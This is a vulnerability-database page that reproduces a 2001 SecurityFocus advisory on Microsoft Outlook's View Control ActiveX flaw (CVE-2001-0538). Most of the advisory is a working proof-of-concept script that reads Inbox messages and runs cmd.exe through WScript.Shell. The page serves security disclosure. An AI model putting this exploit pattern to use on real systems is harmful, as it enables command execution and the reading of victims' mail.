Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2001-0538

Publish Date: 12 Jul 2001

                							

                source: http://www.securityfocus.com/bid/3026/info

Microsoft Outlook introduces a vulnerability that may allow attackers to execute arbitrary commands on a target system.

The vulnerability is due to a new ActiveX control called 'Microsoft Outlook View Control'. The flaw is that this control is marked 'safe for scripting' when it should not be. It is therefore accessible by scripts.

Scripts can execute commands without user knowledge or consent. 

This assumes you have at least one message in Outlook XP's Inbox
&lt;br&gt;
&lt;object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
&gt;
&lt;param name="folder" value="Inbox"&gt;
&lt;/object&gt;

&lt;script&gt;
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();

vv2=vv1.Session.Application.CreateObject("WScript.Shell");

alert("Much more fun is possible");


vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");

}
setTimeout("f()",2000);
&lt;/script&gt;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution

Vulmon Search

About

Products

Connect